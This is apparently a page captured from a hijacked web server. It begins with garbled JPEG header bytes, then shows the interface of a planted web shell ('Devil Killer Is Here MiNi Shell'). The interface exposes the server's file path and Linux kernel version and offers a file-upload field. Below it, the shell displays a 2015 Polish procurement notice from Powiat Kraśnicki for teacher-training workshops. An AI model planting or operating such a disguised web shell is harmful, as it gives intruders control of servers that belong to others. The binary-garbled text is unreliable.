JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150212/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150212/19175-N-2015.html

<p class="kh_header"><b>Kraśnik: Przeprowadzenie przez ekspertów zewnętrznych w ramach sieci współpracy i samokształcenia cyklu szkoleń/warsztatów w ramach projektu pn. Kompleksowy system doskonalenia nauczycieli w powiecie kraśnickim</b><br>
<b>Numer ogłoszenia: 19175 - 2015; data zamieszczenia: 12.02.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Kraśnicki , al. Niepodległości 20, 23-210 Kraśnik, woj. lubelskie, tel. 081 8255889, faks 081 8255052.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przeprowadzenie przez ekspertów zewnętrznych w ramach sieci współpracy i samokształcenia cyklu szkoleń/warsztatów w ramach projektu pn. Kompleksowy system doskonalenia nauczycieli w powiecie kraśnickim.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 3.1 Przedmiotem zamówienia jest świadczenie usługi polegającej na przeprowadzeniu przez ekspertów zewnętrznych w ramach sieci współpracy i samokształcenia cyklu szkoleń/warsztatów w ramach projektu pn. Kompleksowy system doskonalenia nauczycieli w powiecie kraśnickim - realizowanego w ramach Programu Operacyjnego Kapitał Ludzki Działanie 3.5 Kompleksowe wspomaganie rozwoju szkół, współfinansowanego ze środków Unii Europejskiej - Europejskiego Funduszu Społecznego. 
a) W ramach projektu powołano 7 sieci, w tym 2 sieci dla  dyrektorów/ek, wicedyrektorów/ek oraz 5  sieci dla nauczycieli/ek. W ramach jednej sieci współpracować ze sobą będzie od 16 do 28 nauczycieli/ek, dyrektorów/ek  i wicedyrektorów/ek ze szkół i przedszkoli biorących udział w projekcie.
b) Szkolenia będą przeprowadzone  w zakresie następujących sieci:
c) I Sieć Współpracy i Samokształcenia pn. Pozapedagogiczne obowiązki dyrektora szkoły,
d) II Sieć Współpracy i Samokształcenia pn. Rola dyrektora w promocji i budowaniu wizerunku szkoły/przedszkola,
e) III Sieć Współpracy i Samokształcenia pn. Jak wspierać dziecko w uczeniu się matematyki?,
f) IV Sieć Współpracy i Samokształcenia pn. Jak budować własny program nauczania,
g) V Sieć Współpracy i Samokształcenia pn. Praca z dzieckiem o specjalnych potrzebach edukacyjnych,
h) VI Sieć Współpracy i Samokształcenia  pn. Nauczyciele pracują zespołowo,
i) VII Sieć Współpracy i Samokształcenia pn. Jak rozwijać twórcze myślenie uczniów?,
3.2. Doskonalenie polega w szczególności na przeprowadzeniu form szkoleniowych: warsztatów i szkoleń dla maksymalnie 175  nauczycieli i dyrektorów/wicedyrektorów szkół/przedszkoli - rekrutowanych przez Zamawiającego, we wskazanym przez niego miejscu, tj. w szkołach/przedszkolach na terenie powiatu kraśnickiego, biorących udział w projekcie (załącznik nr 7 do SIWZ - Opis przedmiotu zamówienia).</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.40.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie wymagań, których spełnienie wykonawca zobowiązany jest wykazać w sposób szczególny. 
Opis sposobu dokonywania oceny spełniania tego warunku: 
Zamawiający dokona oceny spełniania ww. warunku na podstawie złożonego przez Wykonawcę oświadczenia o spełnieniu warunków udziału w postępowaniu określonych w art. 22 ust. 1 ustawy.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie wymagań, których spełnienie wykonawca zobowiązany jest wykazać w sposób szczególny. 
Opis sposobu dokonywania oceny spełniania tego warunku: 
Zamawiający dokona oceny spełniania ww. warunku na podstawie złożonego przez Wykonawcę oświadczenia o spełnieniu warunków udziału w postępowaniu określonych w art. 22 ust. 1 ustawy.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie wymagań, których spełnienie wykonawca zobowiązany jest wykazać w sposób szczególny. 
Opis sposobu dokonywania oceny spełniania tego warunku: 
Zamawiający dokona oceny spełniania ww. warunku na podstawie złożonego przez Wykonawcę oświadczenia o spełnieniu warunków udziału w postępowaniu określonych w art. 22 ust. 1 ustawy.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca będzie dysponował dla potrzeb niniejszego zamówienia co najmniej jedną osobą do każdej części zamówienia (jeden ekspert może być przypisany do nie więcej niż 3 części zamówienia) posiadającą :
1. Studia wyższe II stopnia.
2. Doświadczenie w pracy z grupą osób dorosłych: min 160 godz. różnych form pracy edukatorskiej prowadzonej z grupami osób dorosłych, w tym działań realizowanych 
w szkołach i prowadzonych dla nauczycieli (np. kursy, szkolenia rad pedagogicznych, nauczycielskich grup przedmiotowych, doradztwo, konsultacje, instruktarz), 
3. Doświadczenie w moderowaniu grupowej pracy koncepcyjnej osób dorosłych, kierowanie spotkaniami/warsztatami poświęconymi zespołowemu wypracowaniu rozwiązań określonych problemów np.: warsztaty strategiczne, tworzenie procedur, wspólne rozwiązywanie problemów (160 godzin).
3. Kwalifikacje trenerskie/edukatorskie potwierdzone zaświadczeniami lub co najmniej 2 letni staż pracy na stanowisku wykładowcy wyższej uczelni.
4. Udział w projektach związanych z wdrażaniem zmian w systemie edukacji, przygotowanie do pracy moderatora (np.: TERM, ukończone kursy i studia przygotowujące do pracy trenera, moderatora, coacha, certyfikat trenerski).
5. Znajomość tematyki edukacyjnej.
6. Ponadto Zamawiający doprecyzował poniżej dodatkowe wymagania do poszczególnych części zamówienia.

Każdy ekspert ma spełniać łącznie wymagania zawarte w pkt 1-5 oraz co najmniej jedno dodatkowe z danego punktu części z której będzie prowadził szkolenie.

Część I:
I. 1. posiada doświadczenie niezbędne do wykonania zamówienia w pracy z grupą osób dorosłych, tj. w okresie ostatnich 3 lat przed terminem składania ofert przeprowadziła różne formy pracy z grupami osób dorosłych w zakresie ochrony danych osobowych w łącznej ilości 40 godzin. 
I. 2. posiada doświadczenie w pracy jako specjalista prawa oświatowego w pracy z grupą osób dorosłych, tj. w okresie ostatnich 3 lat przed terminem składania ofert przeprowadziła różne formy pracy z grupami osób dorosłych w zakresie gospodarowania środkami budżetowymi jednostek oświatowych oraz zamówień publicznych w łącznej ilości 40 godzin.).
I. 3. posiada doświadczenie w pracy jako specjalista prawa oświatowego w pracy z grupą osób dorosłych, tj. w okresie ostatnich 3 lat przed terminem składania ofert przeprowadziła różne formy pracy z grupami osób dorosłych w zakresie prawa pracy w oświacie, w łącznej ilości 40 godzin.).
I. 4. posiada doświadczenie w pracy jako specjalista prawa oświatowego w pracy z grupą osób dorosłych, tj. w okresie ostatnich 3 lat przed terminem składania ofert przeprowadziła różne formy pracy z grupami osób dorosłych w zakresie kontroli zarządczej w oświacie, w łącznej ilości 40 godzin.).

Część II:
II. 1. posiada doświadczenie niezbędne do wykonania zamówienia w pracy z grupą osób dorosłych, tj. w okresie ostatnich 3 lat przed terminem składania ofert przeprowadziła różne formy pracy z grupami osób dorosłych w zakresie wizerunku i wystąpień publicznych w łącznej ilości 40 godzin. 
II. 2. posiada doświadczenie w pracy jako specjalista w pracy z grupą osób dorosłych, tj. w okresie ostatnich 3 lat przed terminem składania ofert przeprowadziła różne formy pracy z grupami osób dorosłych w zakresie polityki medialnej i marketingu w łącznej ilości 40 godzin.
II. 3. posiada doświadczenie w pracy jako specjalista prawa oświatowego w pracy z grupą osób dorosłych, tj. w okresie ostatnich 3 lat przed terminem składania ofert przeprowadziła różne formy pracy z grupami osób dorosłych w zakresie budowania pozytywnego wizerunku szkoły w  środowisku, w łącznej ilości 40 godzin.
II. 4. posiada doświadczenie w pracy jako specjalista prawa oświatowego w pracy z grupą osób dorosłych, tj. w okresie ostatnich 3 lat przed terminem składania ofert przeprowadziła różne formy pracy z grupami osób dorosłych w promocji i wizerunku szkoły, w łącznej ilości 40 godzin.

Część III:
III.1. wykształcenie: wyższe magisterskie II stopnia w zakresie matematyki; nauczyciel dyplomowany, egzaminator; czynny zawodowo; konsultant/ metodyk w w/w obszarze dydaktycznym dotyczącym egzaminowania i oceniania z matematyki mający co najmniej 10 letnie doświadczenie w pracy;  ukończone kursy lub inne formy kształcenia w zakresie przedmiotu zamówienia, w tym m.in. związane z pracą z dzieckiem o specjalnych potrzebach edukacyjnych - minimum 3 formy doskonalenia zawodowego.
III.2. wykształcenie wyższe magisterskie, co najmniej 3 letnie doświadczenie w prowadzeniu zajęć szkoleń wykładów warsztatów z nauczycielami w zakresie postępowania zgodnego z prawem autorskim, zabezpieczania danych osobowych (którymi dysponuje szkoła), zarządzania licencjami szkolnymi, cyberprzemocy, zastosowania multimediów, wykorzystania urządzeń oraz narzędzi internetowych i multimedialnych w pracy zawodowej, co najmniej 5 letni staż  pracy jako nauczyciel/nauczyciel akademicki/coach /trener/edukator w obszarze ICT.
III.3. wykształcenie: wyższe magisterskie II stopnia w zakresie matematyki  z przygotowaniem pedagogicznym; nauczyciel dyplomowany; egzaminator; czynny zawodowo; konsultant/ metodyk w w/w obszarze dydaktycznym dotyczącym egzaminowania i oceniania z matematyki, mający co najmniej 10 letnie doświadczenie w pracy; co najmniej 6-cio letnie doświadczenie w pracy z uczniami metodami aktywizującymi; ukończone kursy lub inne formy kształcenia w zakresie przedmiotu zamówienia - minimum 3 formy doskonalenia zawodowego.
III.4. wykształcenie wyższe magisterskie II stopnia w zakresie matematyki z przygotowaniem pedagogicznym; nauczyciel dyplomowany; egzaminator; czynny zawodowo; konsultant/ metodyk w w/w obszarze dydaktycznym dotyczącym egzaminowania i oceniania z matematyki, mający co najmniej 10 letnie doświadczenie w pracy; ukończone kursy lub inne formy kształcenia w zakresie przedmiotu zamówienia  - minimum 3 formy doskonalenia zawodowego.

Część IV:
IV.1.wykształcenie wyższe  magisterskie z przygotowaniem pedagogicznym; nauczyciel dyplomowany; egzaminator czynny zawodowo; konsultant  co najmniej 10  letnie doświadczenie w prowadzeniu zajęć szkoleń wykładów warsztatów z nauczycielami w zakresie planowania pracy dydaktyczno-wychowawczej zgodnie z obowiązującą podstawą programową, ramowymi planami nauczania i procedurą dopuszczania programów nauczania do użytku szkolnego (w tym: budowa podstawy programowej, poprawność konstrukcyjna, merytoryczna i metodyczna programu, dostosowanie programu do potrzeb i możliwości dzieci, uczniów i uczennic, dla których jest przeznaczony), co najmniej 5 letni staż pracy jako nauczyciel, nauczyciel akademicki, coach, trener, edukator - ukończone kursy lub inne formy kształcenia w zakresie przedmiotu zamówienia  - minimum 3 formy doskonalenia zawodowego.
IV.2. wykształcenie wyższe  magisterskie z przygotowaniem pedagogicznym; nauczyciel dyplomowany; egzaminator czynny zawodowo; konsultant  co najmniej 10  letnie doświadczenie w prowadzeniu zajęć szkoleń wykładów warsztatów z nauczycielami w zakresie planowania pracy dydaktyczno-wychowawczej zgodnie z obowiązującą podstawą programową, ramowymi planami nauczania i procedurą dopuszczania programów nauczania do użytku szkolnego (w tym: budowa podstawy programowej, poprawność konstrukcyjna, merytoryczna i metodyczna programu, dostosowanie programu do potrzeb i możliwości dzieci, uczniów i uczennic, dla których jest przeznaczony), co najmniej 5 letni staż pracy jako nauczyciel, nauczyciel akademicki, coach, trener, edukator ukończone kursy lub inne formy kształcenia w zakresie przedmiotu zamówienia  - minimum 3 formy doskonalenia zawodowego.

IV.3. wykształcenie wyższe  magisterskie z przygotowaniem pedagogicznym; nauczyciel dyplomowany; egzaminator czynny zawodowo; konsultant  co najmniej 10  letnie doświadczenie w prowadzeniu zajęć szkoleń wykładów warsztatów z nauczycielami w zakresie planowania pracy dydaktyczno-wychowawczej zgodnie z obowiązującą podstawą programową, ramowymi planami nauczania i procedurą dopuszczania programów nauczania do użytku szkolnego (w tym: budowa podstawy programowej, poprawność konstrukcyjna, merytoryczna i metodyczna programu, dostosowanie programu do potrzeb i możliwości dzieci, uczniów i uczennic, dla których jest przeznaczony), co najmniej 5 letni staż pracy jako nauczyciel, nauczyciel akademicki, coach, trener, edukator ukończone kursy lub inne formy kształcenia w zakresie przedmiotu zamówienia  - minimum 3 formy doskonalenia zawodowego.
IV.4. wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym; nauczyciel dyplomowany; egzaminator czynny zawodowo; konsultant  co najmniej 10  letnie doświadczenie w prowadzeniu zajęć szkoleń wykładów warsztatów z nauczycielami w zakresie planowania pracy dydaktyczno-wychowawczej zgodnie z obowiązującą podstawą programową, ramowymi planami nauczania i procedurą dopuszczania programów nauczania do użytku szkolnego (w tym: budowa podstawy programowej, poprawność konstrukcyjna, merytoryczna i metodyczna programu, dostosowanie programu do potrzeb i możliwości dzieci, uczniów i uczennic, dla których jest przeznaczony), co najmniej 5 letni staż pracy jako nauczyciel przedmiotów zawodowych, nauczyciel akademicki, coach, trener, edukator ukończone kursy lub inne formy kształcenia w zakresie przedmiotu zamówienia - minimum 3 formy doskonalenia zawodowego.

Część V:
V.1. wykształcenie: wyższe magisterskie w zakresie pedagogiki specjalnej, lub psychologii specjalnej; nauczyciel dyplomowany czynny mający co najmniej 10 letnie doświadczenie w pracy z uczniem o specjalnych potrzebach edukacyjnych lub obniżoną normą intelektualną; ukończone szkoły, kursy lub inne formy kształcenia w zakresie przedmiotu zamówienia - minimum 3 formy doskonalenia zawodowego.
V.2. wykształcenie: wyższe magisterskie w zakresie pedagogiki specjalnej, lub psychologii specjalnej; nauczyciel dyplomowany czynny, mający co najmniej 10 letnie doświadczenie w pracy z uczniem o specjalnych potrzebach edukacyjnych lub obniżoną normą intelektualną; ukończone szkoły, kursy lub inne formy kształcenia w zakresie przedmiotu zamówienia tj. autyzmu, zespołu Aspergera - minimum 3 formy doskonalenia zawodowego.
V.3. wykształcenie: wyższe magisterskie w zakresie pedagogiki specjalnej, lub psychologii specjalnej; nauczyciel dyplomowany czynny, mający co najmniej 10 letnie doświadczenie w pracy z uczniem o specjalnych potrzebach edukacyjnych lub obniżoną normą intelektualną; ukończone szkoły, kursy lub inne formy kształcenia w zakresie przedmiotu zamówienia tzn. w zakresie pracy z dzieckiem z ADHD - minimum 3 formy doskonalenia zawodowego.
V.4. wykształcenie: wyższe magisterskie w zakresie pedagogiki specjalnej, lub psychologii lub terapii pedagogicznej; pracy z uczniem o specyficznych trudnościach w uczeniu się; nauczyciel dyplomowany czynny, mający co najmniej 10 letnie doświadczenie w pracy z uczniem o specyficznych trudnościach w uczeniu się, ukończone szkoły, kursy lub inne formy kształcenia w zakresie przedmiotu zamówienia m.in. pracy z uczniem o specyficznych trudnościach w uczeniu się  - minimum 3 formy doskonalenia zawodowego.


Część VI:
VI.1. wykształcenie wyższe magisterskie, co najmniej 3 letnie doświadczenie w prowadzeniu zajęć szkoleń, wykładów, warsztatów z nauczycielami w zakresie podstaw prawnych tworzenia zespołów nauczycielskich, celów funkcjonowania zespołów, korzyści z pracy zespołowej, organizacji pracy zespołu nauczycielskiego z uwzględnieniem dynamiki rozwoju zespołu, ról zespołowych (analizy zasobów), komunikacji w zespole, zarządzania konfliktem, co najmniej 10 letni staż pracy jako nauczyciel, nauczyciel akademicki ,coach ,trener, edukator, ukończone kursy lub inne formy kształcenia w zakresie przedmiotu zamówienia  - minimum 3 formy doskonalenia zawodowego.
VI.2. wykształcenie wyższe magisterskie, co najmniej 3 letnie doświadczenie w prowadzeniu zajęć, szkoleń, wykładów, warsztatów z nauczycielami w zakresie komunikacji interpersonalnej, komunikacji w zespole, zarządzania konfliktem, co najmniej 10 letni staż pracy jako nauczyciel, nauczyciel akademicki, coach, trener, edukator, ukończone kursy lub inne formy kształcenia w zakresie przedmiotu zamówienia - minimum 3 formy doskonalenia zawodowego.
VI.3. wykształcenie wyższe magisterskie, co najmniej 3 letnie doświadczenie w prowadzeniu zajęć szkoleń wykładów warsztatów z nauczycielami w zakresie podstaw prawnych tworzenia zespołów nauczycielskich, celów funkcjonowania zespołów, korzyści z pracy zespołowej, organizacji pracy zespołu nauczycielskiego z uwzględnieniem dynamiki rozwoju zespołu, ról zespołowych (analizy zasobów), komunikacji w zespole, zarządzania konfliktem, co najmniej 10 letni staż pracy jako nauczyciel, nauczyciel akademicki, coach, trener, edukator, ukończone kursy lub inne formy kształcenia w zakresie przedmiotu zamówienia - minimum 3 formy doskonalenia zawodowego.
VI.1. wykształcenie wyższe magisterskie, co najmniej 3 letnie doświadczenie w prowadzeniu zajęć szkoleń wykładów warsztatów z nauczycielami w zakresie podstaw prawnych tworzenia zespołów nauczycielskich, celów funkcjonowania zespołów, korzyści z pracy zespołowej, organizacji pracy zespołu nauczycielskiego z uwzględnieniem dynamiki rozwoju zespołu, ról zespołowych (analizy zasobów), komunikacji w zespole, zarządzania konfliktem, co najmniej 10 letni staż pracy jako nauczyciel, nauczyciel akademicki, coach, trener, edukator, ukończone kursy lub inne formy kształcenia w zakresie przedmiotu zamówienia - minimum 3 formy doskonalenia zawodowego.

Część VII :
VII.1. wykształcenie: wyższe magisterskie w zakresie pedagogiki, lub psychologii; nauczyciel dyplomowany czynny, mający co najmniej 10 letnie doświadczenie w pracy z uczniem; ukończone szkoły, kursy lub inne formy kształcenia w zakresie przedmiotu zamówienia - minimum 3 formy doskonalenia zawodowego.
VII.2. wykształcenie: wyższe magisterskie w zakresie pedagogiki, lub psychologii, nauczyciel dyplomowany czynny, mający co najmniej 10 letnie doświadczenie w pracy z uczniem; ukończone szkoły, kursy lub inne formy kształcenia w zakresie przedmiotu zamówienia np. kreatywnego myślenia, metod pracy wspierającej twórcze myślenie - minimum 3 formy doskonalenia zawodowego.
VII.3. wykształcenie: wyższe magisterskie w zakresie pedagogiki, lub psychologii; nauczyciel dyplomowany czynny, mający co najmniej 10 letnie doświadczenie w pracy z uczniem; ukończone szkoły, kursy lub inne formy kształcenia w zakresie przedmiotu zamówienia np. kreatywnego myślenia, metod pracy wspierającej twórcze myślenie - minimum 3 formy doskonalenia zawodowego.
VII.4.  wykształcenie: wyższe magisterskie w zakresie pedagogiki, lub psychologii; nauczyciel dyplomowany czynny, mający co najmniej 10 letnie doświadczenie w pracy z uczniem; ukończone szkoły, kursy lub inne formy kształcenia w zakresie przedmiotu zamówienia np. kreatywnego myślenia, metod pracy wspierającej twórcze myślenie - minimum 3 formy doskonalenia zawodowego.

Zamawiający dokona oceny spełnienia tego warunku na podstawie oświadczenia zgodnie z załącznikiem nr 2 oraz nr 6 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie wymagań, których spełnienie wykonawca zobowiązany jest wykazać w sposób szczególny. 
Opis sposobu dokonywania oceny spełniania tego warunku: 
Zamawiający dokona oceny spełniania ww. warunku na podstawie złożonego przez Wykonawcę oświadczenia o spełnieniu warunków udziału w postępowaniu określonych w art. 22 ust. 1 ustawy.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Doświadczenie Wykonawcy - 10</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający przewiduje możliwość zmiany umowy w zakresie i na warunkach przewidzianych w przepisach ustawy Prawo zamówień publicznych, w następujących przypadkach:
1) Termin wykonania zamówienia:
a) zaistnienie w trakcie realizacji umowy przestojów i opóźnień zawinionych przez Zamawiającego,
b) działania siły wyższej (np. klęski żywiołowe, strajki generalne lub lokalne), mającej bezpośredni wpływ na terminowość wykonywania usług,
2) Sposób i warunki płatności:
a) w związku z powstałą po zawarciu umowy sytuacją braku środków Zamawiającego na sfinansowanie wykonania umowy zgodnie z pierwotnie określonymi warunkami,
b) w sytuacjach wynikających ze specyfiki działalności Zamawiającego,
